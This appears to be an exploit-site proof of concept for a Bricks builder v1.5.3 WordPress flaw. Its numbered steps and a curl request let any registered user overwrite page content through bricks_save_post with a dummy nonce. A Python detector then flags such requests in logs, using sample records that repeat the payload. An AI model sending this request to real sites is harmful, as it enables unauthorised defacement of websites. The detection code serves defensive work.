## https://sploitus.com/exploit?id=WPEX-ID:AB4735AD-B2EC-45A3-9872-3BBAEE7E143D
1. Start with a clean WordPress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new WordPress installations)
6. Send the following request to the server

```bash
curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Cookie: INSERT_COOKIES_HERE' \
--data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aijdog%22%2C%22name%22%3A%22text%2Dbasic%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22text%22%3A%22Pwned%22%7D%7D%5D'
```

7. The contents of the page should be replaced with a paragraph reading "Pwned"
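
One way to flag the request from step 6 in logged traffic, as an added example that is not part of the original advisory or of Bricks' code. The record fields (`user`, `role`, `method`, `url`, `body`) and the `NON_EDITOR_ROLES` set are assumptions about what a WAF or audit log that captures request bodies would provide.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# WordPress core nonces (wp_create_nonce) are 10 lowercase hex characters.
WP_NONCE_RE = re.compile(r"[0-9a-f]{10}")
NON_EDITOR_ROLES = {"subscriber"}  # assumption: roles that cannot edit posts here
AJAX = "http://example.com/wp-admin/admin-ajax.php"

def inspect_request(rec):
    """Return a finding for a suspicious bricks_save_post request, else None."""
    is_ajax = urlsplit(rec["url"]).path.endswith("/wp-admin/admin-ajax.php")
    if rec["method"].upper() != "POST" or not is_ajax:
        return None
    form = parse_qs(rec["body"], keep_blank_values=True)
    if form.get("action", [""])[0] != "bricks_save_post":
        return None
    reasons = []
    if not WP_NONCE_RE.fullmatch(form.get("nonce", [""])[0]):
        reasons.append("malformed nonce")
    if rec.get("role") in NON_EDITOR_ROLES:
        reasons.append("role cannot edit posts")
    if not reasons:
        return None
    try:  # list the Bricks element types being written, for triage
        elements = json.loads(form.get("content", ["[]"])[0])
        names = [e.get("name") for e in elements if isinstance(e, dict)]
    except (ValueError, TypeError):
        names = []
    return {"user": rec.get("user"), "post_id": form.get("postId", [""])[0],
            "reasons": reasons, "elements": names}

# Constructed sample records (not real traffic); the first mirrors the request above.
SAMPLE = [
    {"user": "newuser", "role": "subscriber", "method": "POST", "url": AJAX,
     "body": "action=bricks_save_post&postId=2&area=content&nonce=0&content="
             "%5B%7B%22id%22%3A%22aijdog%22%2C%22name%22%3A%22text%2Dbasic%22%2C"
             "%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B"
             "%22text%22%3A%22Pwned%22%7D%7D%5D"},
    {"user": "editor1", "role": "editor", "method": "POST", "url": AJAX,
     "body": "action=bricks_save_post&postId=2&area=content"
             "&nonce=a1b2c3d4e5&content=%5B%5D"},
    {"user": "newuser", "role": "subscriber", "method": "POST", "url": AJAX,
     "body": "action=heartbeat&nonce=0"},
]

FINDINGS = [f for f in map(inspect_request, SAMPLE) if f]
```

The nonce test checks format only, so a well-formed but invalid nonce is caught here only through the role check.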